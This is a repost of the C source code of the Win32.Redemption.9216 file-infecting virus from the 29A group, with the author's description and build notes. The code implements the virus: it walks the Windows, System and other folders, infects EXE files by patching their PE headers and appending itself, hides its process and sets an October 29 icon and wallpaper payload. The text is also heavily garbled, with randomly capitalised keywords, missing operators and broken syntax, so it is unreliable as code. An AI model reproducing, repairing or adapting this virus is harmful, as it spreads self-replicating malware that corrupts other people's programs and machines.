Win32

xiaoxiao2021-03-05 23

?????????????????????????????????????????????????? ?????????????? [win32red.c]??

/ *

Win32.redemption.9216 Virus.

Description

This is a resident HLL (High Level Language) Win32 appender virus

written in C. It infects all sort of EXE files: DOS EXE files, NE files,

PE Files from Win32 (WIN95 / NT), etc. Infected Files Only Spread in Win32

Platforms, Including Win3.x with Win32S Subsystem. The Virus Infects

EXE files by changing the pointer at 3Ch in the MZ header which points

to the new EXE header (if any) placing another pointer to the virus own

PE header attached at the end of the file. When the virus executes, it

Infects All Exe Files from Windows, System and Current Folder. Then IT

spawns itself as another task (thus staying resident), makes itself

Invisible (Thus Becoming Unloadable) and Periodically Searches for Non-

infected EXE files in all drives, infecting them in the background.

Most interesting feature of this virus is that infected files do not

grow at all, that is, files have same size before and after infection.

The virus compresses part of its host by using own JQCODING algorithm.

It also copies host icon to its own resource section to show original icon.

The virus has no problems related to finding the KERNEL32 base address

and its API functions. This is because all API functions are imported

implicitly from the virus own import table. The virus takes special care

of patching appropriately all RVA and RAW fields from its own PE header,

Including Code, Data, Imports, Relocations and Resource Sections. This

Is Needed for the Virus to Spread Sussefully Through All Kinds of Hosts.

PayLoad

ON October The 29th, The Virus Replaces The Main Icon of All InfectedPrograms With ITS OWN ICON, A 29a logo. It also changes default

Desktop Wallpaper to Such Logo.

To Build

Just run the build.bat file to build release version. VC 6.0 compiler

WAS Used Since It Proved To OPTIMize Better Than Borland's or Watcom's.

Greets go to

All 29aers ..... for all the work Quality and Effort during this # 3 issue,

Keep Up The Good Work Dudees!

B0Z0 ......... · for Such Invaluable Feedback During BetateSting, thanks

a lot man, you rock!

My GF Carol .... WHO'S Been Pushing Me To Quit The Scene, But Still Not

Enough, I.o.u. # 8).

Rajaat / Sandy ... hey we all miss you .. come back to 29a!

Disclaimer

This Source Code Is Provided for Educational Purposes Only. The Author IS

NOT RESPONSIBLE IN ANY WAY, For Problems It May Cause Due To Improper USE!

* /

#define Win32_Lean_and_mean

#include

#ifdef TSR

#include "win95sys.h"

#ENDIF

#ifdef compr

#include "jqcoding.h"

#ENDIF

#ifdef icon

#include "winicons.h"

#include "winres.h"

#ENDIF

// constants ..

#ifdef _MSC_VER // Microsoft VC

# neydef release

# define data_section_raw 0x200 // 0xe00

# else

# define data_section_raw 0x1400 // 0x1600

# Endif

# Define compiler_data 0 // 0x30 (VC 4)

# Define sizeof_resource_data 0x504

#ENDIF

#ifdef __borlandc__ // Borland C

# neydef release

# Define data_section_raw? // 0x1000

# Define compiler_data 0

# else

# define data_section_raw? // 0x6200

# Define compiler_data 0x74

# Endif

# define sizeof_resource_data?

#ENDIF

#define virus_size (file_size - pE_HE_HE_HEADER_OFFSET)

#define startof_codedata (data_section_raw compiler_data - / pE_HEADER_OFFSET)

#define Rawselfcheck (Startof_Codedata Sizeof (Szcopyright) - 5)

#define init_vars_offset (STARTOF_CODEDATA SIZEOF (SZCopyRight) /

SizeOf (Szexts) 3 & -4)

#ifdef TSR

#define rawprogtype init_vars_offset

#define rawsrcvir (RawProgType 4)

#ELSE

#define rawsrcvir init_vars_offset

#ENDIF

#define rawoldptr2newexe (Rawsrcvir 4)

#define rawoldfilesize (RawoldPtr2newexe 4)

#ifdef compr

#define rawncomprsize (RawoldFileSize 4)

#define rawciphertarget (RawncomPrsize 4)

#define TmpVal Rawciphertarget

#ELSE

#define TmpVal RawoldFileSize

#ENDIF

#ifdef icon

#define RawoldResourceAddr (TmpVal 4)

#ENDIF

#ifndef COMPR

#define size_pad 101

#ENDIF

#define om_only false

#define Write_Access True

#define sizeof_fileext 3

#define max_filesize 0x4000000 // 64 MB

#ifdef compr

#define min_filesize 0x4000 // 16 kB

#ENDIF

#define prev_lapse 3 // 1 * 60 // 10 * 60 // Seconds

#define seek_lapse 3 // 5 // 30 // Seconds

// macros ..

#define RVA2PTR (Type, Base, RVA) ((DWORD) (DWORD) (RVA))))

#define isfile (pfinddata) (! (pfinddata) -> dwfileAttributes & /

FILE_ATTRIBUTE_DIRECTORY)))

#define isfolder (! isfile (pfinddata) && /

(pfinddata) -> cfilename [0]! = '.')

#define pushvar (Object) __ASM Push (Object)

#define popvar (Object) __ASM POP (Object)

// Type Definitions ..

#ifdef TSR

Typedef byte prog_type, * pprog_type;

#define TSR_COPY 0

#define host_copy 1

#ENDIF

Typedef byte boolb;

Typedef struct _image_relocation_data {// not defined in Winnt.h

Word relocoffset: 12;

Word relocty: 4;

} Image_relocation_data, * pimage_relocation_data; #ifdef icon

Typedef struct _iconimages {

PiconImage Platergeicon;

PiconImage psmallicon;

} IconImages, * piconimages;

#ENDIF

// Global Variables ..

Byte szcopyright [] = "(c) Win32.Redemption (c ver.1.0) by jqwerty / 29A",

Szexts [] = "ex .cr";

#ifdef TSR

PROG_TYPE progtype = host_copy;

#ENDIF

DWORD SRCVIR = pe_header_offset, oldptr2newexe = 1, OldFileSize = file_size;

#ifdef compr

DWORD NCOMPRSIZE = 1, ciphereTarget = 1;

#ENDIF

#ifdef icon

DWORD OLDRESOURCEADDR = Resource_SECTION_RVA;

#include "jq29aico.h"

#ENDIF

DWORD EXITCODE = 0;

#ifndef COMPR

DWORD_TGTVIR;

#ELSE

DWORD CIPHERSOURCE;

#ENDIF

DWORD _RVADELTA;

Handle Hhandle1, HHHANDLE2;

Byte Pathname [MAX_PATH], Hostname [MAX_PATH], TMPNAME [MAX_PATH];

WIN32_FIND_DATA FINDDATA, FINDDATATSR;

Startupinfo Startupinfo = {0};

PROCESS_INFORMATION Processinfo;

PIMAGE_DOS_HEADER PMZ, Phostmz;

PIMAGE_NT_HEADERS _PHOSTPE;

#ifdef msgbox

Boolb Cancelfolderseek = false, Cancelfileseek = FALSE

#ifdef TSR

Handle hmutex;

#ENDIF

#ifdef icon

Boolb bpayloadday = false;

PIMAGE_RESOURCE_DIRECTORY PRSRCSTART;

Byte Hostlargeicon [SizeOf_Large_ICON];

Byte hostsmallicon [sizeof_small_icon];

#ENDIF

#ifdef compr

Byte Comprmem [0x10000];

#ifdef icon

#define sizeof_BMP 0x8076 // 32kb bitmap header ..

BYTE JQ29ABMP [SIZEOF_BMP] = {0};

#ENDIF

#define SZ29A (SZCopyright Sizeof (Szcopyright) - 4)

#define szjq (Szcopyright Sizeof (Szcopyright) - 12)

// function declarations ..

Void Win32red (Void);

Boolb OpenMapFile (Pbyte FileName, Boolb WriteAccess);

Void Closetruncfile (Boolb WriteAccess);

Void InfectPath (Pbyte Pathname, DWORD CBYTES); Void CloseUnmapFile (Boolb WriteAccess);

Pbyte Getendofpath (Pbyte PTGT, PBYTE PSR);

PVOID RVA2RAW (DWORD RVA);

#ifdef icon

Void fixResources (pimage_resource_directory prxrcdir);

Void getDefault (PiconImages PiconImages,

Pvoid pnergype;

#ENDIF

#ifdef TSR

Void Exectemp (PROG_TYPE Progtype);

__inline void seektsr (void);

Void WalkFolder;

Void HideProcess (Void);

__inline pprocess_database getprocessdb (void);

__inline pthread_database getthreaddb (void);

#ELSE

__INline Void Exectemp (Void);

#ENDIF

// function definitions ..

Void win32red () {

#ifdef TSR

#ifndef msgbox

Handle hmutex;

#ENDIF

HideProcess ();

#ENDIF

#ifdef icon

#include "payload.c"

#ENDIF

IF (GetModuleFileName (0, Hostname, Max_Path) &&

OpenMAPFile (Hostname, Read_only) {

Phostmz = PMZ;

Pushvar (HHANDLE1); // Better Pushin / Popin Than USIN A TEMP. VAR.

Pushvar (HHANDLE2); // Better Pushin / Popin Than USIN A TEMP. VAR.

SRCVIR = (DWORD) PMZ;

#ifdef TSR

IF (ProgType! = TSR_COPY) {

#ifdef msgbox

MessageBox (Null, "Non-Resident Stage ..", SZCopyright, MB_OK);

#ENDIF

#ifdef compr

Pushvar (ncomprsize);

Pushvar (Ciphertarget);

#ENDIF

InfectPath (Pathname, GetWindowsDirectory;);

InfectPath (Pathname, GetSystemDirectory (Pathname, 0x7f);

InfectPath (Pathname, (* Pathname = '.', 1));

#ifdef compr

Popvar (Ciphertarget);

Popvar (ncomprsize);

#ENDIF

#ifdef TSR

}

Else {

IF ((hmutex = Createmutex (Null, False, Szjq)))))))

IF (getLastError () == error_already_exists)

#if 1

#ifdef msgbox

Messagebox (Null, "Tsr: Mutex Exists!", Szcopyright, MB_OK,

#ENDIF

CloseHandle (hmutex),

EXITPROCESS (EXITCODE); # IF 1

#ifdef msgbox

Else

MessageBox (NULL, "TSR: Mutex Created!", SZCopyright, MB_OK;

#ENDIF

#ifdef msgbox

MessageBox (NULL, "Resident Stage ..", SZCopyright, MB_OK);

#ENDIF

Seektsr ();

#ifdef msgbox

MessageBox (NULL, "TSR: BYE BYE. ..", SZCopyRight, MB_OK;

#ENDIF

}

#ENDIF

Popvar (HHANDLE2); // Better Pushin / Popin Than USIN A TEMP. VAR.

Popvar (HHANDLE1); // Better Pushin / Popin Than USIN A TEMP. VAR.

PMZ = phostmz;

CloseunmapFile (Read_only);

#ifdef TSR

IF (ProgType! = TSR_COPY) {

IF ((hmutex = OpenMuteX (Mutex_all_Access, false, szjq))))

#ifndef msgbox

CloseHandle (hmutex);

#ELSE

CloseHandle (hmutex),

MessageBox (Null, "Host: Mutex EXISTS!", SZCopyright, MB_OK);

#ENDIF

Else

IF (GetTemppath (Max_Path, Pathname) - 1

#ifdef msgbox

MessageBox (Null, "Host: Mutex Doesn't Exist!",

Szcopyright, MB_OK,

#ENDIF

EXECTEMP (TSR_COPY);

Getendofpath (Pathname, Hostname);

EXECTEMP (Host_copy);

}

#ELSE

Getendofpath (Pathname, Hostname);

EXECTEMP ();

#ENDIF

}

EXITPROCESS (EXITCODE);

}

#ifdef TSR

Void Exectemp (PROG_TYPE Progtype) {

#ELSE

__INline void execTemp () {

#ENDIF

PBYTE PSRC, SZCMDLINE;

Handle hfindfile;

#ifdef compr

Boolb decomprok = TRUE;

#ENDIF

#ifdef TSR

DWORD CBYTES;

IF (progtype == TSR_COPY) {

IF (pathname [(cbytes = lstrlen) - 1]! = '//')

Pathname [CBYTES ] = '//';

* (PDWORD) (PDWORD) (Pathname CBYTES) = '* a92';

* (PDWORD) (Pathname CBYTES 4) = '*.';

IF ((HfindFile = FindfirstFile (Pathname, & Finddata))! =

INVALID_HANDLE_VALUE) {

Do {

LSTRCPY (Pathname Cbytes, FindData.cfileName);

Deletefile (pathname);

} while (FindNextFile (Hfindfile, & Finddata);

FindClose (HFindFile);

}

Pathname [CBYTES] = '/ x0';

}

#ENDIF

IF (! (cbytes = lstrlen (pathname),

GetTempFileName (Pathname, SZ29A, 0, Pathname) &&

(GetTemppath (max_path, pathname) - 1> = max_path - 1 ||

! (CBYTES = lstrlen (pathname),

GetTempFileName (Pathname, SZ29A, 0, PathName))))))

Return;

IF (progty! = TSR_COPY)

For (;;) {

PSRC = Pathname Lstrlen (lstrcpy (tmpname, pathname);

While (* - psrc! = '.'); * (PDWORD) (PSRC 1) = 'exe'

IF (Movefile (TmpName, Pathname)

Break;

Deletefile (tmpname);

Pathname [CBYTES] = '/ x0';

IF (! GetTempFileName (Pathname, SZ29A, 0, Pathname)

Return;

}

IF (Copyfile (Hostname, Pathname, False) &&

SetFileAttributes (Pathname, File_attribute_normal &&

(Hfindfile = FindfirstFile (Hostname, & Finddata))! =

INVALID_HANDLE_VALUE) {

IF (OpenMapFile (Pathname, Write_Access)) {

#ifdef TSR

IF (ProgType! = TSR_COPY) {

#ENDIF

PMZ-> E_LFANEW = Oldptr2neWexe;

#ifndef COMPR

Finddata.nfilesizelow = OldFileSize;

#ELSE

#ifdef msgbox

#if 0

MessageBox (Null, "Host Decoding is about to start ..",

Szcopyright, MB_OK;

#ENDIF

IF (jq_decode (rva2ptr (Pbyte, PMZ, OldFileSize),

RVA2PTR (Pbyte, PMZ, Ciphertarget Ncomprsize),

NcomPrsize,

Comprmem)! = OldFileSize - CiphereTarget) {

Decomprok = false;

#ifdef msgbox

#if 1

MessageBox (Null, "Decode Error: File Is Corrupt!",

Szcopyright, MB_OK;

#ENDIF

#if 0

}

Else {

MessageBox (Null, "Host Decoded SuccesFully!",

Szcopyright, MB_OK;

#ENDIF

}

#ENDIF

#ifdef TSR

}

Else

* RVA2PTR (PPROG_TYPE, RVA2PTR (pimage_nt_headers, pmz, pmz-> e_lfanew),

RawProgType) = TSR_COPY;

#ENDIF

#ifndef COMPR

UnmapViewoffile (PMZ);

Closetruncfile (Write_Access);

#ELSE

CloseunmapFile (WRITE_ACCESS);

IF (DecomproK) {

#ENDIF

Psrc = getcommandline (); while (* psrc! = 0x20 && * psrc);

IF ((szcmdline = (pbyte) GlobalLoc (LPTR, Max_Path

LSTRLEN (PSRC) 1)))) {

LSTRCAT (LSTRCPY (Szcmdline, Pathname), PSRC);

(Byte) Startupinfo.cb = sizeof (startupinfo);

IF (CreateProcess (NULL, SZCMDLINE, NULL, NULL, FALSE,

Create_new_console, null, null,

& Startupinfo, & processinfo) {

#ifdef TSR

IF (ProgType! = TSR_COPY) {

#ENDIF

WaitforsingleObject (ProcessInfo.hprocess, Infinite);

GetExitcodeProcess (ProcessInfo.hprocess, & EXIXITCODE);

CloseHandle (ProcessInfo.hthread);

CloseHandle (ProcessInfo.hprocess);

#ifdef TSR

}

#ENDIF

}

GlobalFree (Szcmdline);

}

#ifdef compr

}

#ENDIF

}

FindClose (HFindFile);

}

Deletefile (pathname);

}

Boolb OpenMapFile (Pbyte FileName, Boolb WriteAccess) {

#ifndef COMPR

DWord newFileSize;

#ENDIF

HHHANDE1 = CREATEFILE (FileName,

Writeaccess

Generic_Read | generic_write

: Generic_read,

File_share_read,

NULL,

Open_EXISTING,

FILE_ATTRIBUTE_NORMAL,

0);

IF (HHANDLE1 == Invalid_Handle_Value)

Return False;

HHHANDLE2 = CREATEFILEMAPPING (HHANDLE1,

NULL,

WriteAccess? Page_Readwrite: Page_Readonly,

#ifdef compr

#ELSE

Writeaccess

? Newfilesize =

((_TGTVIR =)

(Finddata.nfilesizerow 0x1FF &

-0x200)

PE_HEADER_OFFSET)

(Virus_Size Size_Pad - 1)))

/ Size_pad) * Size_pad

: 0,

#ENDIF

NULL);

IF (! HHANDLE2) {

CloseHandle (HHANDLE1);

Return False;

}

PMZ = MapViewoffile (HHANDLE2, WRITEACCESS? FILE_MAP_WRITE: FILE_MAP_READ,

#ifdef compr

#ELSE

WriteAccess? NewFileSize: 0

#ENDIF

);

IF (! pmz) {

Closetruncfile (WriteAccess);

Return False;

}

Return True;

}

Void Closetruncfile (Boolb WriteAccess) {

CloseHandle (HHANDLE2);

IF (WriteAccess) {

#ifndef COMPR

SetFilePointer (HHANDE1, FINDDATA.NFILESZELOW, NULL, FILE_BEGIN);

Setndoffile (HHANDLE1);

#ENDIF

SetFileTime (HHANDE1, NULL, NULL, & FINDDATA.FTLASTWRITETIME);

}

CloseHandle (HHANDLE1);

}

Void InfectPath (Pbyte Pathname, DWORD CBYTES) {

PBYTE PSRC, PTGT, PEXT, PENDRELOCS, PrelocBase;

#ifdef compr

PBYTE PCOMPRBUF;

SystemTime SystemTime;

#ENDIF

DWORD FileExt, TGTVIR, RVADELTA, RAWDELTA, NCOUNT, NSECTIONS, NRVAS;

PIMAGE_SECTION_HEADER PSECTIONHDR;

PIMAGE_NT_HEADERS PPE, PHOSTPE;

PIMAGE_BASE_RELOCATION PRELOCS;

PIMAGE_RELOCATION_DATA PRELOCDATA;

PIMAGE_IMPORT_DESCRIPTOR PIMPORTS;

PIMAGE_THUNK_DATA PIMPORTDATA;

Handle hfindfile;

Boolb infect, bvalidhead;

#ifdef icon

IconImages IconImages;

#ENDIF

IF (0x7f <= CBYTES - 1) Return;

IF (Pathname [CBYTES - 1]! = '//') Pathname [CBYTES ] = '//';

* (PDWORD) (Pathname CBYTES) = '*. *';

#ifdef msgbox

Switch (Messagebox (Null, Pathname, Szcopyright,

MB_YESNOCANCEL | MB_ICONEXCLAMATION) {

Case IDCANCEL:

Cancelfolderseek = true;

Case IDNO:

Return;

}

#ENDIF

IF ((HfindFile = FindfirstFile (Pathname, & Finddata) ==

INVALID_HANDLE_VALUE)

Return;

Do {

{

#ifdef compr

Byte Keysecond, TMPKEYSEC

#ENDIF

IF (! isfile (& findData) || Finddata.nFileSizeHigh ||

#ifdef compr

Finddata.nfilesizelow

#ENDIF

(Finddata.nfilesizelow & -max_filesize) || #ifndef COMPR

! (Finddata.nfilesizelow% size_pad)

#ELSE

(FiletimetosystemTime (& Finddata.ftlastwrittime, & SystemTime),

TMPKEYSEC =

(Byte) ((byte) systemtime.wyear - (byte) SystemTime.wmonth

(Byte) SystemTime.wday - (byte) SystemTime.WHOUR

(Byte) SystemTime.wminute ^ 0x6a) & 0x3e),

Keysecond = TMPKEYSEC <60? TMPKEYSEC: TMPKEYSEC - 4,

Keysecond == (Byte) SystemTime.WSecond)

#ENDIF

)

CONTINUE;

#ifdef compr

(Byte) systemtime.wsecond = keysecond;

#ENDIF

}

PTGT = LSTRCPY (Pathname CBytes, Finddata.cfileName)

lstrlen (findData.cfilename);

FileExt = * (PDWORD) (PTGT - SIZEOF_FILEEXT) & ~ 0xFF202020;

PEXT = SZEXTS;

Do {

IF (FileExt! = (* (pdword) pext & ~ 0xff202020) ||

PTGT [- 1 - SIZEOF_FILEEXT]! = '.' ||

OpenMapFile (Pathname, Read_only))

CONTINUE;

Infect = false;

#ifdef compr

PCOMPRBUF = NULL;

#ENDIF

IF (PMZ-> E_MAGIC == Image_DOS_SIGNATURE) {

BvalidHeader = false;

PPE = RVA2PTR (PIMAGE_NT_HEADERS, PMZ, PMZ-> E_LFANEW);

IF ((DWORD) PMZ <(DWORD) PPE &&

(DWORD) PPE

PMZ,

Finddata.nfilesizelow)

- 0x7f &&

(BVALIDHEADER = TRUE,

PPE-> Signature == Image_NT_SIGNATURE &&

* RVA2PTR (PDWORD, PPE, RAWSELFCHECK) == 'A92 /')) {

} else {

#ifndef COMPR

Infect = true;

#ELSE

{

DWORD NMAXCOMPRSIZE;

IF ((PCOMPRBUF =

(Pbyte) GlobalAlloc

LPTR,

nmaxcomprsize =

Finddata.nfilesizelow / 8 * 9 12

)

)) {

#ifdef msgbox

#if 0

Messagebox (Null, "Host Encoding is about to start ..",

Finddata.cfilename, MB_OK);

#ENDIF

NcomPrsize =

JQ_Encode (pcomprbuf nmaxcomprsize, rva2ptr (pbyte, pmz, finddata.nfilesizerow),

Finddata.nfilesizerlow - sizeof (image_dos_header),

Comprmem);

TGTVIR = (Ciphertarget Ncomprsize - PE_HEADER_OFFSET

0x1ff & -0x200) pe_header_offset;

IF (TGTVIR VIRUS_SIZE - 1

#ifdef msgbox

#if 0

MessageBox (Null, "Host Encoded Susfully!",

Finddata.cfilename, MB_OK,

#ENDIF

Infect = true;

#ifdef msgbox

#if 0

Else

MessageBox (Null, "Host Encoded Succesfully, But"

"Win32.Red Code Didn't Fit,"

"Skipping File ..",

Finddata.cfilename, MB_OK);

#ENDIF

}

#ENDIF

}

CloseunmapFile (Read_only);

if (! Infect ||! setfileAttributes (Pathname, File_Attribute_NORMAL) {

#ifdef compr

IF (PCOMPRBUF) GlobalFree (PCOMPRBUF);

#ENDIF

CONTINUE;

}

#ifdef msgbox

Switch (Messagebox (Null, Pathname, Szcopyright,

MB_YESNOCANCEL | MB_ICONEXCLAMATION) {

Case IDCANCEL:

Cancelfileseek = true;

Case iDYES:

#ENDIF

IF (OpenMapFile (Pathname, Write_Access)) {

#ifdef icon

IConimages.Plargeicon = NULL;

Iconimages.psmallicon = NULL;

IF (! bPayloadDay && bvalidhead) {

GetDefaulticons (& iconImages,

RVA2PTR (PVOID, PMZ, PMZ-> E_LFANEW);

IconImages.Plargeicon {

PSRC = (pbyte) iconImages.PlargeCon;

PTGT = HostLargeicon;

ncount = sizeof_large_icon;

Do * ptgt = * psrc ; while (--ncount);

IconImages.psmallicon {

PSRC = (pbyte) iconImages.psmallicon;

Ncount = sizeof_small_icon;

Do * ptgt = * psrc ; while (--ncount);

}

#ENDIF

#ifdef compr

PTGT = RVA2PTR (PBYTE, PMZ, CiphereTarget);

PSRC = (pbyte) ciphersource; ncount = ncomprsize;

Do * ptgt = * psrc ; while (--ncount);

GlobalFree (pcomprbuf); pcomprbuf = null; // this line isbo

_phostpe = phostpe = rva2ptr (pimage_nt_headers,

PMZ,

TGTVIR);

#ELSE

_phostpe = phostpe = rva2ptr (pimage_nt_headers, // the comnted code

PMZ, // below generates

TGTVIR = _TGTVIR); // More bytez Than

#ENDIF // this Code Becoz

PTGT = (pbyte) phostpe; // the linker adds

PSRC = (pbyte) srcvir; // Other functionz

ncount = virus_size; // not needed!

Do * ptgt = * psrc ; while (--ncount); //

// copyMemory (PBYTE) (phositpe = rva2ptr (pimage_nt_headers, // not in

// pmz, // ann of DLL

// TGTVIR), // but in

// (pbyte) srcvir, // A RTL.

// virus_size); //

#ifdef TSR

IF (progtype == TSR_Copy)

* RVA2PTR (PPROG_TYPE, PhOSTPE, RAWPROGTYPE) = host_copy;

#ENDIF

* RVA2PTR (PDWORD, PhoStpe, Rawsrcvir) = TGTVIR;

* RVA2PTR (pdword, phositpe, rawoldptr2newexe) = PMZ-> E_LFANEW;

* RVA2PTR (pdword, phositpe, rawoldfilesize) = finddata.nfilesizelow;

#ifdef compr

* RVA2PTR (PDWORD, Phostpe, RawncomPrsize) = ncomprsize;

* RVA2PTR (PDWORD, PhoStpe, Rawciphertarget) = CiphereTarget;

#ENDIF

_RVADELTA = RVADELTA =

((Phositpe-> optionalHeader.sizeOfheaders =

(Rawdelta = TGTVIR - Phostmz-> E_LFANEW))

0xFFF & -0x1000)

- phostpe-> optionalHeader.BaseOfcode

// fix rvas in peheader ..

PhoStpe-> OptionalHeader.addressofentryPoint = RVADELTA;

PhoStpe-> OptionalHeader.BaseOfcode = RVADELTA;

PhoStpe-> OptionalHeader.BaseOfData = rvadelta;

PsectionHDR = image_first_section (phostpe);

Nsections = phostpe-> fileheader.numberofsections; do {

PsectionHDR-> PointertorawData = Rawdelta;

PsectionHDR -> VirtualAddress = RVADELTA;

WHILE (--NSECTIONS);

Phostpe-> optionalHeader.sizeOfImage =

(PsectionHDR - 1) -> VirtualAddress

(PsectionHDR - 1) -> Misc.Virtualsize

0xFFF & -0x1000;

NRVAS = Phostpe-> OptionalHeader.NumberofrvaAndsizes;

Do {

IF (! Phostpe-> OptionalHeader.DataDirectory [- nrvas].

VirtualAddress)

CONTINUE;

Phostpe-> OptionalHeader.DataDirectory [NRVAS].

VirtualAddress = RVADELTA;

WHILE (NRVAS);

// fix rvas in code & reloc section ..

Pendrelocs =

RVA2PTR

PBYTE,

(Prelocs =

RVA2RAW (PhoStpe-> OptionalHeader.

DataDirectory [image_directory_entry_basereeloc].

VirtualAddress),

PhoStpe-> OptionalHeader.

DataDirectory [image_directory_entry_basereeloc].

SIZE - Image_sizeOf_base_relocation;

Do {

PrelocBase = rva2raw (prelocs-> virtualaddress = rvadelta);

Prelocdata = (PIMAGE_RELOCATION_DATA) (Prelocs 1);

(DWORD) preline = prelocs-> sizeofblock;

Do {

IF (preLocdata-> reloctype! = image_rel_based_highlow)

CONTINUE;

* RVA2PTR (PDWORD,

PrelocBase,

Prelocdata-> relocoffset) = rVadelta;

} while ((DWORD) Prelocdata <(DWORD) Prelocs;

} While (DWORD) Prelocs <(DWORD) PENDRELOCS;

// fix rvas in import section ..

Pimports =

RVA2RAW (PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Import].

VirtualAddress;

Do {

PimportData =

#ifDef _MSC_VER

RVA2RAW ((DWORD) Pimports-> OriginalFirstthunk = RVADELTA);

#ENDIF

#ifdef __borlandc__

RVA2RAW ((DWORD) Pimports-> u.originalfirstthunk = rvadelta); # ENDIF

IF (DWORD) PIMPORTDATA)

Do {

(DWORD) PIMPORTDATA-> U1.AddressofData = RVADELTA;

} While ( PimportData) -> u1.addressofdata);

Pimports-> Name = rvadelta;

PimportData = RVA2RAW ((DWORD) Pimports-> Firstthunk = RVADELTA);

Do {

(DWORD) PIMPORTDATA-> U1.AddressofData = RVADELTA;

} While ( PimportData) -> u1.addressofdata);

} While ( pimports) -> name);

#ifdef icon

// fix rvas in resource section ..

PRSRCSTART =

RVA2RAW (PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

VirtualAddress = (* RVA2PTR (PDWORD,

PhoStpe,

RawoldResourceAddr)

= Rvadelta));

(PBYTE) PRSRCSTART [0x2e] = 2;

(PBYTE) PRSRCSTART [0x4e4] = 2;

FixResources (PRSRCSTART);

ICONIMAGES.PLARGEICON || bpayloadday) {

PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

SIZE = SizeOf_Resource_Data;

PTGT = (pbyte) PRSRCSTART 0XD0;

PSRC = HostLargeicon;

ncount = sizeof_large_icon;

Do * ptgt = * psrc ; while (--ncount);

IconImages.psmallicon || bPayloadDay) {

Ncount = sizeof_small_icon;

Do * ptgt = * psrc ; while (--ncount);

}

Else {

((PBYTE) PRSRCSTART [0x2e] = 1;

(PBYTE) PRSRCSTART [0x4e4] = 1;

}

Else {

PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

VirtualAddress = 0;

PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

SIZE = 0;

}

#ENDIF

PMZ-> E_LFANEW = TGTVIR;

#ifdef compr

SystemTimetOfiletime (& SystemTime, & Finddata.ftlastWritetime);

#ENDIF

CloseunmapFile (WRITE_ACCESS);

}

#ifdef msgbox

}

#ENDIF

SetFileAttributes (Pathname, Finddata.dwfileAttributes);

#ifdef msgbox

Cancelfileseek {

Cancelfileseek = false;

Goto Breakhere; // can't use break; because of the 2 while's.

}

#ENDIF

#ifdef compr

IF (PCOMPRBUF) GlobalFree (PCOMPRBUF);

#ENDIF

} while (* (pEXT = sizeof_fileext);

} while (FindNextFile (Hfindfile, & Finddata);

#ifdef msgbox

Breakhere:

#ENDIF

FindClose (HFindFile);

}

Void CloseunMapFile (Boolb WriteAccess) {

UnmapViewoffile (PMZ);

#ifndef COMPR

CloseHandle (HHANDLE2);

IF (WriteAccess)

SetFileTime (HHANDE1, NULL, NULL, & FINDDATA.FTLASTWRITETIME);

CloseHandle (HHANDLE1);

#ELSE

Closetruncfile (WriteAccess);

#ENDIF

}

Pbyte getendofpath (Pbyte PTGT, PBYTE PSR) {

PBYTE PTGTBEGIN = PTGT, PSREND = PSR;

While (* psrend );

While (PSR <--psrend && psrend [-1]! = '//' && psrend [-1]! = ':');

While (PSR

IF (PTGTBEGIN == PTGT || PTGT [-1]! = '//') * ((pword) ptgt) = './/';

* PTGT = '/ x0'; return (PTGT);

}

PVOID RVA2RAW (DWORD RVA) {

PIMAGE_SECTION_HEADER PSECTIONHDR = image_first_section (_phostpe);

DWORD nsections = _phostpe-> fileheader.numberofsections;

Do {

IF (PsectionHDR-> VirtualAddress <= RVA &&

RVA VirtualAddress PsectionHDR-> Misc.Virtualsize)

Return (PVOID) (RVA - PsectionHDR-> VirtualAddress

PsectionHDR-> PointertorawData

(DWORD) PMZ);

PsectionHDR ;

WHILE (--NSECTIONS);

Return NULL;

}

#ifdef icon

Void FixResources (pimage_resource_directory prcdir) {pimage_resource_directory_entry prsrcdirentry;

DWORD NCOUNT;

IF (! prsrcdir)

Return;

PRSRCDIRENTRY = (PIMAGE_RESOURCE_DIRECTORY_ENTRY (PRSRCDIR 1);

Ncount = prsrcdir-> numberofnamedentries prsrcdir-> numberofidentries;

PRSRCDIRENTRY-> DataISDIRECTORY

FixResources (rva2ptr (pimage_resource_directory, // recursion ..

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodirectory))))

: (RVA2PTR (PIMAGE_RESOURCE_DATA_ENTRY,

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodata) -> Offsettodata

= _Rvadelta);

While (PRSRCDIRENTRY , --NCOUNT);

}

#define large_icon 0

#define small_icon 1

PiconImage getDefaulticon (PIMAGE_RESOURCE_DIRECTORY PRSRCDIR,

Boolb icontype,

Boolb bfalse) {

PIMAGE_RESOURCE_DIRECTORY_ENTRY PRSRCDIRENTRY

PIMAGE_RESOURCE_DATA_ENTRY PRSRCDATAENTRY

PiconImage PiconImage;

DWORD NCOUNT;

IF (! prsrcdir)

Return NULL;

PRSRCDIRENTRY = (PIMAGE_RESOURCE_DIRECTORY_ENTRY (PRSRCDIR 1);

Ncount = prsrcdir-> numberofnamedentries prsrcdir-> numberofidentries;

Do {

IF (! bfalse &&prcdirentry-> id! = (word) rt_icon)

CONTINUE;

IF (PRSRCDIRENTRY-> DataiRIRECTORY) {

PiconImage = getDefault (rva2ptr (pimage_resource_directory,

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodirectory,

ICONTYPE,

True);

IF (! PiconImage)

CONTINUE;

Return PiconImage;

}

PRSRCDATAENTRY = RVA2PTR (pimage_resource_data_entry,

PRSRCSTART,

PRSRCDIRENTRY-> Offsettodata);

PiconImage = rva2raw (prcrcdataentry-> offsettodata);

IF (PiconImage-> ichead.bisize! = sizeof (bitmapinfohead) ||

PiconImage-> ichead.biwidth! = (iconType == Large_icon

? 32

: 16) ||

PiconImage-> icheader.biheight! = (iconType == LARGE_ICON? 64

: 32) ||

PiconImage-> icheader.biplanes! = 1 ||

PiconImage-> ichead.biBitcount! = 4)

CONTINUE;

Return PiconImage;

} While ( prrsrcdirentry, --ncount);

Return NULL;

}

Void getDefault (PiconImages PiconImages,

Pvoid pneorpe) {

IF ((pimage_nt_headers) pnergype) -> Signature == Image_NT_SIGNATURE) {

PIMAGE_NT_HEADERS PPE = _phostpe = (pimage_nt_headers) PNeorpe;

PIMAGE_RESOURCE_DIRECTORY PRSRCDIR =

PRSRCSTART =

RVA2RAW (PPE-> OptionalHeader.

